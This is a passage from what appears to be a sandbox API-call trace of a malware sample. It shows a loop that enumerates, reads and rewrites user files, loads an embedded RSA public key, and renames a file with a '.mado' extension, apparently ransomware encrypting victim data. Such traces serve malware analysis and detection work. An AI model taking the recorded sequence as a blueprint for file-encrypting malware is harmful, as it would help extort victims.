hHeap=0x2c0000) returned 1 [0204.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5c8 | out: hHeap=0x2c0000) returned 1 [0204.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5c8 [0204.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0204.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe610 | out: hHeap=0x2c0000) returned 1 [0204.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eb80 [0204.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe640 | out: hHeap=0x2c0000) returned 1 [0204.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0204.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6edb0 [0204.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eec8 [0204.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5c8 | out: hHeap=0x2c0000) returned 1 [0204.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74e80 [0204.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bfa0 [0204.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bd90 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bfa0 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5f8 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe628 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5e0 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5b0 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc88 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe598 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b810c8 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6be98 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.996] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x18be7, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x18be7, lpOverlapped=0x0) returned 1 [0204.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0204.996] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x18bec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.996] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0204.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74e80 [0204.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74e80, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b752b0 [0204.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0204.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0204.996] WriteFile (in: hFile=0x63c, lpBuffer=0x3b752b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b752b0*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b752b0 | out: hHeap=0x2c0000) returned 1 [0204.996] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.996] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.997] CloseHandle (hObject=0x63c) returned 1 [0204.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bb80 [0204.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b74e80 [0204.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.998] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sZ1h4QiinWnf\\d_HC7Wx7GxjYqhQQa.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sz1h4qiinwnf\\d_hc7wx7gxjyqhqqa.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sZ1h4QiinWnf\\d_HC7Wx7GxjYqhQQa.gif.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sz1h4qiinwnf\\d_hc7wx7gxjyqhqqa.gif.mado")) returned 1 [0204.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0204.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.999] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b2fd8 | out: hHeap=0x2c0000) returned 1 [0205.000] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda69ebb0, ftCreationTime.dwHighDateTime=0x1d5e6ed, ftLastAccessTime.dwLowDateTime=0xcc7f6a80, ftLastAccessTime.dwHighDateTime=0x1d5e26e, ftLastWriteTime.dwLowDateTime=0xcc7f6a80, ftLastWriteTime.dwHighDateTime=0x1d5e26e, nFileSizeHigh=0x0, nFileSizeLow=0x14db6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FeFVDggLljOT82m.flv", cAlternateFileName="FEFVDG~1.FLV")) returned 1 [0205.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67258 [0205.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x3b2fd8 [0205.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67258 | out: hHeap=0x2c0000) returned 1 [0205.000] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sZ1h4QiinWnf\\FeFVDggLljOT82m.flv") returned=".flv" [0205.000] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sZ1h4QiinWnf\\FeFVDggLljOT82m.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sz1h4qiinwnf\\fefvdgglljot82m.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.000] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=85430) returned 1 [0205.000] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.002] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x14d90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.002] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.004] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.004] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x14db6, lpOverlapped=0x0) returned 1 [0205.005] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.005] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.005] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.005] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0205.006] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.006] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.006] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.006] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.006] GetLastError () returned 0x0 [0205.006] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.006] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0205.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.006] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.006] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.006] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14dc0) returned 0x3b81690 [0205.007] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0205.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b810c8 [0205.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe598 [0205.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81110 [0205.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5b0 [0205.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5e0 [0205.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe628 [0205.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5f8 [0205.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0205.007] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0205.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5e0 | out: hHeap=0x2c0000) returned 1 [0205.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5f8 | out: hHeap=0x2c0000) returned 1 [0205.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe628 | out: hHeap=0x2c0000) returned 1 [0205.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe628 [0205.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0205.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe5f8 [0205.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0205.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe5e0 [0205.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b72b80 [0205.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b72c98 [0205.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0205.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5f8 | out: hHeap=0x2c0000) returned 1 [0205.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5e0 | out: hHeap=0x2c0000) returned 1 [0205.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe628 | out: hHeap=0x2c0000) returned 1 [0205.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0205.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.008] GetCurrentThreadId () returned 0x600 [0205.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66078 [0205.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b682b8 [0205.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0205.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66180 [0205.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.009] GetCurrentThreadId () returned 0x600 [0205.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66288 [0205.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66390 [0205.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe628 [0205.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5e0 [0205.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.010] RtlAllocateHeap (HeapHandle=0x2c0000, 